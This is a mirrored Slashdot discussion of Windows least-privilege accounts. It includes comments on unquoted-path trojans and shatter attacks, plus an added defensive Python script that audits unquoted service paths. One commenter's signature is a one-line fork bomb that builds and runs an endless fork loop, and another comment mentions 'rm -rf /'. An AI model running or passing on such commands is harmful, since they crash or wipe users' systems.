Slashdot Mirror


Windows Users Ignoring LUA Security

blankify writes "eWeek is running a story about the least-privilege, no-admin option available in Windows (2000/XP/2003) that has been mostly ignored by end users. From the article: '"To the average user, the notion of non-admin is abstract and obscure," said Michael Howard, a senior security program manager in Microsoft Corp.'s security business and technology unit. "Most users just don't know they can set up least-privilege accounts in Windows today, and that's just a sad reality."'"

7 of 522 comments

  1. It could be the default option during install by Colin+Smith · · Score: 5, Interesting

    How about, embracing and extending good practice...

    --
    Deleted
  2. Windows' fault by Dacmot · · Score: 5, Interesting

    Could it be "the sad reality" because in Windows up until XP (ignoring 2000 and NT) there were no user-privilege differences?

    Maybe MS should start educating the population and force them to create passworded least-privileged accounts and choose a password for the administrator account when installing or booting an OEM for the first time. Maybe also the administrator should be blocked out of surfing the web and playing games so that people just don't use the admin account for everything.

  3. Win XP Is An Ugly Kludge by Quirk · · Score: 3, Interesting

    While I was started on a TI 99/4 my parents got for me, sans monitor, and hooked up to an old 14 inch b&w TV, every machine following that was a wintel box up to being introduced to Mandrake (as it then was) 6.

    DOS 3.3 was the first MS OS I understood, so much so that, when the first DOSSHELL came out, I asked why would someone need that? I jumped on the NT technology because, when it first came out, it was well documented, (vis a vis my experience) and it allowed a whole new playing field. When NT 4 came out MS moved Video and Printer drivers from User mode to kernel mode. This was, IIRC, about the time Bill Gates had his vision of the PC integrated multi media household. I believe the PC version of Windows has pursued this vision of multimedia OS to the point of having become in WinXP an ugly, bloated kludge, but it does, as much as possible, deliver in an ugly way, as a backward compatible multimedia OS.

    Win 2K was the last OS to maintain the promise that Win New Technology brought with it. Win XP saw the culmination of MS' effort to integrate Win95/98/ME with some of the benefits of NT, but the end result is an all and everything everyman's stew meant to satisfy the cravings of the masses.

    I run WinXP on a web box for multimedia but thanks to the lessons gleaned online (/.:) I'm moving on to a *BSD, or one of the upcoming microkernel OSes to do research.

    --
    "Academicians are more likely to share each other's toothbrush than each other's nomenclature."
    Cohen
  4. Re:doh by TopSpin · · Score: 4, Interesting

    most likely because this option breaks most applications

    This is why most people don't know about it; developers and vendors barely understand Windows security, so it's ignored. The users instinctively know this and they play along, ignoring the existing capabilities.

    The Microsoft platform is closed, poorly designed, obscure and ambiguous. Side effects are common and difficult to prevent or correct. Frobbing things that vendors aren't paying close attention to is a good way to invent new breakage.

    Go ahead, be the first on your block to harden Windows with naive LUA. Spend the next two years chasing down truly arcane breakage. Teach Microsoft and third party vendors how to promulgate securable products. Meanwhile, I'll be using software on platforms that figured out most of this stuff a decade ago.

    --
    Lurking at the bottom of the gravity well, getting old
  5. Re:doh by Hal_Porter · · Score: 3, Interesting

    Actually the best way is to use Fast User Switching. Have an Admin account and your normal one. Do Adminy stuff in the Admin account and everything else in the normal one. Once you get used to it, it's a couple of keystrokes to flip between the two. Unlike Run As, the two zones are on different desktops, which means that you're invulnerable to Shatter attacks on windows running with admin privileges.

    Here's a good blog with much more info

    Some people even prefer this to su.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
  6. Re:Duh by n0-0p · · Score: 4, Interesting

    I think you're over-simplifying this. The Windows NT kernel and core services were designed with security in mind. The real issue is that the shell, UI, and APIs do a really poor job of enforcing and providing convenient access to that model. MS made a tough choice when they created the Win32 API; they kept developer compatibility and convenience but made security a whole lot harder. There are too many default behaviors in Windows that are just dangerous.

    Look how CreateProcess will progressively search for an executable at each space delimited chunk in an unquoted path; that makes a great trojan attack. Consider the shatter vulnerability and associated dangers that result from simple window input; that's why services have to be run on a separate ACL'd desktop to be safe. Consider how trivially a power user can escalate to admin; look at how many apps need at least that privilege. Look how much code you have to write to set a simple multi-user DACL on an object.

    The fact is that security is very hard to do properly in an MS environment, and historically MS has done a very poor job of promoting and simplifying it. I audit security software now, but when I wrote software I had a ton of homegrown libraries to handle things that shouldn't have been necessary. So while I agree the tools are there, you almost have to be a security expert to use them properly.
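
The unquoted-path lookup described in the comment above, as an added example that is not part of the original thread: it lists the paths an unquoted command line can resolve to before the intended image, and flags configured command lines that need quoting. The service names and ImagePath values are constructed, and the rule that the first prefix ending in `.exe` is the intended image is an assumption of this sketch.

```python
import ntpath

def earlier_candidates(command_line):
    """Paths tried before the intended image when the command line is unquoted."""
    line = command_line.strip()
    if line.startswith('"'):
        return []  # quoted module name: nothing is ambiguous
    tokens = line.split()
    tried = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            return tried  # assumption: first prefix ending in .exe is the intended image
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"  # a name without an extension gets .exe appended
        tried.append(prefix)
    return tried[:-1]  # no .exe token: treat the full string as the intended image

# Constructed sample: service name -> ImagePath value (all names hypothetical).
SAMPLE_IMAGE_PATHS = {
    "AcmeAgent": r"C:\Program Files\Acme Tools\agent.exe -service",
    "AcmeUpdater": r'"C:\Program Files\Acme Tools\updater.exe" /svc',
    "SvcHostGroup": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
}

def audit(image_paths):
    """Return {name: earlier candidates} for entries that should be quoted."""
    findings = {}
    for name, path in image_paths.items():
        tried = earlier_candidates(path)
        if tried:
            findings[name] = tried
    return findings

if __name__ == "__main__":
    for name, tried in audit(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: quote the path; also resolvable as {tried}")
```

Quoting the executable path in the command line, or passing the image explicitly as `lpApplicationName`, removes the ambiguity.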

  7. Re:closer still... by Anonymous Coward · · Score: 4, Interesting

    Yeah? That's because Unix type systems have had multiple users since, well, ever.

    You have to accept the fact that certain people shouldn't do certain things on computers.

    The fact is that it should be dead simple for a grandma so able to do so, to install a card game in her home directory, without bothering anyone else on a system--a unix system. It goes there, and, what? There's no issue. Quake 3 has the ability to install into a non-root privileged user's account. If grandma rm -rf /'s, she's only going to take her stuff out, and maybe other people who share her group.

    In Windows land, that card game may well have a fit if it doesn't get installed to c:\program files\bullshit cards. If it doesn't work that way on any system, the program is b0rked. Written by an idjet. It doesn't help that MS has programmed people and software writers to behave this way since, well, ever.

    ****EVERY**** MS home directory should by default have a My Programs folder, and software installed by that user should end up there--unless it really, really does need administrator access, or it needs to be shared by multiple users. Otherwise, who cares if grandma installs bonsai buddy, it's only going to affect her account and not spread to administrator--where everything can be gleefully cleaned.